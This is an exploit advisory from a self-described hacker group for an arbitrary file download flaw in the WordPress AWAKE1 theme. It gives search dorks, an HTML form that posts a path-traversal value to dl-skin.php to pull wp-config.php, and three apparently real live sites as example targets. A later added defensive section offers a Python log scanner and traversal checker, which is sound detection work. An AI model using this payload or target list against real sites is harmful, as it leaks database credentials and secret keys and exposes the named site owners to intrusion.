
WordPress AWAKE1 Theme Arbitrary File Download Vulnerability

Author: Killer~X , Published: 04-01-2015
#Title : WordPress AWAKE1 Theme Arbitrary File Download Vulnerability

#Author : Killer~X

#Date : 1/1/2015
################ [ Killer~X ] ################
Facebook : http://www.facebook.com/xXalreshyXx

Ask : http://ask.fm/ALRESHY

Twitter : https://twitter.com/killerx00x

Email : M_ox@hotmail.com or Cco@hotmail.com

################ [ Killer~X ] ################


################ [ Yemeni Electronic Army ] ################

Yemeni Electronic Army : http://yeahacker.blogspot.in/

Official Members : Monds | King alnhzh | San3a T3rr0rist | GeeSuth | Al maistro | Muteb spack gen | Killer~X | Shraoop /.


################ [ Yemeni Electronic Army ] ################

__________________________________________________________________________________

#Vendor : www.wordpress.org

#google Dork :
1- inurl:/wp-content/themes/AWAKE1
2- wp-content/themes/AWAKE-1

#Tested on : windows


################################################

#Exploit :

<html>

<body>

<form action="http://127.0.0.1/wp-content/themes/awake1/lib/scripts/dl-skin.php" method="POST">

<b>File</b>:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>

<input type="submit" value=Download>

</form>

</body>

</html>

#example :
http://primoyazoo.com/wp-content/themes/awake1/lib/scripts/dl-skin.php
http://bakhtar-feldspar.com/en/wp-content/themes/awake1/lib/scripts/dl-skin.php
http://www.gamtnhealth.org/wp-content/themes/awake-1/lib/scripts/dl-skin.php
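
For defenders: the request above is a POST to dl-skin.php whose _mysite_download_skin value climbs out of the theme directory. The following is an added example, not part of the original advisory or the theme's code. It scans Combined Log Format access logs for POSTs to that endpoint and, where request bodies are captured (for instance by a WAF audit log, an assumption here), checks a parameter value for traversal. The names find_hits and escapes_base and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Endpoint from the advisory; the theme directory appears as awake1, AWAKE1 and awake-1.
ENDPOINT = re.compile(r"/wp-content/themes/awake-?1/lib/scripts/dl-skin\.php", re.I)
# Combined Log Format: ip ident user [time] "METHOD path proto" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jan/2015:10:01:02 +0000] "POST /wp-content/themes/awake1/lib/scripts/dl-skin.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [04/Jan/2015:10:01:09 +0000] "POST /en/wp-content/themes/AWAKE-1/lib/scripts/dl-skin.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Jan/2015:10:02:00 +0000] "GET /wp-content/themes/awake1/style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Jan/2015:10:02:05 +0000] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
]

def find_hits(lines):
    """Return (ip, time, status, size) for every POST to the dl-skin.php endpoint."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        if ENDPOINT.search(unquote(m["path"])):
            size = 0 if m["size"] == "-" else int(m["size"])
            hits.append((m["ip"], m["time"], int(m["status"]), size))
    return hits

def escapes_base(value):
    """True if a _mysite_download_skin value would leave the directory it is joined to."""
    prev = None
    while prev != value:  # undo nested URL encoding such as %252e%252e%252f
        prev, value = value, unquote(value)
    normalized = value.replace("\\", "/")  # the advisory was tested on Windows
    if "\x00" in normalized or normalized.startswith("/"):
        return True
    if re.match(r"^[A-Za-z]:", normalized):  # drive-letter absolute path
        return True
    return ".." in normalized.split("/")

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print("POST to dl-skin.php:", hit)
    print(escapes_base("../../../../../wp-config.php"), escapes_base("blue.zip"))
```

A 200 response to such a POST with a body of a few kilobytes is the case to triage first, since wp-config.php holds the database credentials and secret keys, which should be rotated if the file was served.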



__________________________________________________________________________________

#Greeting to : All my friends

<3 I love u mom <3

||~ Done ~||
